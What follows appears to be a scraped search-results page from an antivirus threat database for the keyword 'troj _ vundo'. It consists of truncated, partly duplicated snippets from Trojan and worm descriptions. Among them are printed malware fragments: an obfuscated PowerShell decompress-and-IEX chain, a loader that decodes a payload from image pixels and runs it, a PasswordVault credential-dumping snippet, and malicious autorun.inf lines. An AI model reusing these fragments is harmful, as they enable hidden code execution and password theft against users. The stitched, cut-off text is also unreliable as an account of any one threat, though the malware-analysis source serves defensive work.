Keyword: troj _ vundo
44738 Total Search   |   Showing Results : 61 - 80
\winsvcs.exe {Removable Drive letter}\.lnk {Removable Drive letter}\_\DeviceManager.exe {Removable Drive letter}\autorun.inf %User Temp%\{Random Number}.exe %Application Data%\winsvcs_.txt %User Temp%\Windows
creates the following event(s): {Computer Name}{Fullpath and Filename} special characters replaced with '_' Troj/VBDrop-AS (Sophos) ,Trojan horse Generic35.AXFQ (AVG) ,W32/Dorkbot.BAAr (Fortinet)
wI7op6geihA8f4iLOX5Q+2i2a6iXYqRKjaBxcECtgNY5TPudzgnueD73mzes/F2bInS+6Ouc3BGV5bufqmb5WsK9U87R3X9t7vQOFOO6FmuJBveaeyWOZ8fcq+k2tvjyXOXVrLOt8aPS0zc9T3tn0R8J4xijDHhVy2rTFd1FjmLpiRwXQpkBSZB2/X+CEc+YPeF4ZypffZED1FkGaKkbCmpexvcJRu0HP539Hw==') ${8LN} [SYstEM.Io.comPRESSIoN.cOMprEssiONMode]::decOmpreSS)| ForEach-OBJEct{ func SysTem.iO.StReAMREADeR( `$_${8LN} [sySteM.text.encoDing]::utf8) }| forEACH-obJEct {`$_.ReaDTOend() })"\"| .(
.docx → decrypted and dropped as %All Users Profile%\Profixier\IncrediBuild\SysSettings64.exe {Malware File Path}\~$簡歷_短版.docx→ decrypted and dropped as %All Users Profile%\Profixier\IncrediBuild\Solid
detected as TROJ_DLOADR.ARP Trojan:Win32/Vundo.IX (Microsoft); Trojan.Win32.Monderd.gen (Kaspersky); Vundo (McAfee); Troj/Virtum-Gen (Sophos); Trojan.Vundo.Gen.4 (FSecure); Trojan.Win32.Monder.gen.1 (Sunbelt
strings: {garbage} [AutoRun] {garbage} open={garbage}.bat {garbage} shell\open\Command={garbage}.bat _ {garbage} shell\open\Default=1 shell\explore\Default=2 {garbage} shell\explore\Command={random}.bat _
*PaymentsLandingPage.aspx* **StatementsLandingPage.aspx* */* */* **Action.ANZRetUser.External.SignOn* ** **SrvPage* **_*.asp
{random GUID} TizPath = "{malware path and file name}" Download Routine This adware saves the files it downloads using the following names: %Desktop%\Windows 9 Professional (Eng_x64_Single Link) May 2014 _
$tt=$ds.GetPixel($x,$_);$mk[$_*428+$x]=([math]::Floor(($tt.B-band15)*16)-bor($tt.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($mk[0..1907])) ${DS}=&("{2}{0}{1}" -f'u','lture','Get-C') | &(
{BLOCKED}"));$mk=fr Byte[] 2140;(0..4)|%{foreach($x in(0..427)){$tt=$ds.GetPixel($x,$_);$mk[$_*428+$x]=([math]::Floor(($tt.B-band15)*16)-bor($tt.G -band 15))}};IEX(
{random characters} This report is generated via an automated analysis system. Trojan:Win32/Tracur.AH, Trojan:Win32/Tracur.AH, Trojan:Win32/Tracur.AH, Trojan:Win32/Tracur.AH, Troj (Microsoft); Generic.bfr
if the malware name and/or path has the following substrings: samp smpl vir malw test troj Can do any of the following depending on the installation date of "%System%\win32k.sys": Create svchost
New Spam Bot Gmail Downtime Exposes Ad-Rigged Sitet Let the Games Begin 404 toolkit used by Vundo creators How to Get Cash… and Malware Malware with a nose for news June Malware Roundup Downloaded from
New Spam Bot Gmail Downtime Exposes Ad-Rigged Sitet Let the Games Begin 404 toolkit used by Vundo creators How to Get Cash… and Malware Malware with a nose for news June Malware Roundup Downloaded from
[AutoRun] {garbage} open={garbage}.bat {garbage} shell\open\Command={garbage}.bat _ {garbage} shell\open\Default=1 shell\explore\Default=2 {garbage} shell\explore\Command={random}.bat _ {garbage} Process
malw test troj Can do any of the following depending on the installation date of "%System%\win32k.sys": Create svchost process with this argument "-1 EVT{Volume ID}" Inject codes to created svchost.exe
*PaymentsLandingPage.aspx* **StatementsLandingPage.aspx* **Action.ANZRetUser.External.SignOn* ** **SrvPage* **_*.asp* *
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault; $b = 'Browser: Internet Explorer | Edge'; $a = ($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | SELECT
following substrings: samp smpl vir malw test troj (Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, Windows
VeraCrypt TrueCrypt Can Log off Current User Deletes the files inside %User Temp% folder Terminates itself if the malware name and/or path has the following substrings: samp smpl vir malw test troj (Note: